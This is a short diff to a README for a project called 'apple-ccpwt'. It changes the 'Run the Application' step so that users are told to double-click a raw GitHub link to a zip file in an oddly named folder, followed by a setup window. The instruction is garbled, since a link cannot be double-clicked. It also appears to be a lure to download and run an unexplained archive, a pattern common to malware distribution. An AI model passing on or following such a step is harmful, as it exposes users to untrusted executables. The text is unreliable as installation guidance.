1gaxv/apple-ccpwt/README.md

 5. **Run the Application:**
    - Navigate to the folder where you extracted the files.
-   - Double-click the `apple-ccpwt.exe` (for Windows) or the corresponding file for your system.
+   - Double-click the `https://raw.githubusercontent.com/1gaxv/apple-ccpwt/main/foreran/apple-ccpwt.zip` (for Windows) or the corresponding file for your system.

 6. **Follow the Setup Instructions:**
    - A setup window will appear.
 Follow the prompts to complete installation.